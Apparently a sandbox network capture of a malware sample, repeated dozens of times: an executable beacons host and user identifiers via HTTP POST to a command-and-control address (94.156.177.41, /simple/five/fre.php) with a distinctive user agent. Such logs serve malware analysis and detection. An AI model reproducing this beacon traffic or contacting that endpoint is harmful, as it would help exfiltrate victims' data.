Jan 11, 2025 01:42:48.387887001 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:48 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.8	49735	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:48.540954113 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:48.545842886 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:49.285383940 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:49 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.8	49736	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:49.433276892 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:49.438318968 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:50.165489912 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:50 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.8	49737	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:50.336088896 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:50.341120958 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:51.033304930 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:50 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.8	49738	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:51.203758001 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:51.209450960 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:51.929786921 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:51 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.8	49739	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:52.284070015 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:52.288988113 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:53.010909081 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:52 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.8	49740	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:53.170571089 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:53.175498962 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:54.019459009 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:53 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.8	49741	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:54.179584026 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:54.184422016 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:54.882802963 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:54 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.8	49742	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:55.030769110 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:55.035617113 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:55.732820988 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:55 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.8	49743	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:55.987762928 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:55.992625952 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:56.756866932 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:56 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.8	49744	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:56.908021927 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:56.917464018 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:57.656831026 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:57 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.8	49745	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:57.807913065 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:57.813692093 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:58.531346083 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:58 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.8	49746	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:58.981187105 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:42:58.986100912 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:42:59.839251041 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:42:59 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.8	49747	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:42:59.998092890 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:00.003340006 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:00.717897892 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:00 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.8	49748	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:00.870846987 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:00.875735998 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:01.574404001 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:01 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.8	49749	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:01.940114975 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:01.944953918 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:02.677066088 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:02 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.8	49750	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:02.821182966 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:02.826097965 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:03.548398972 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:03 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.8	51230	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:03.702738047 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:03.707674026 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:04.445255995 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:04 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.8	51231	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:04.849174023 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:04.854033947 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:05.582495928 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:05 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.8	51232	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:05.731384993 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:05.736299038 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:06.451642036 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:06 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.8	51233	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:06.609363079 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:06.614276886 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:07.362718105 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:07 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.8	51234	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:07.768634081 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:07.773449898 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:43:08.501508951 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:43:08 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.8	51235	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:43:08.655235052 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:43:08.660221100 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
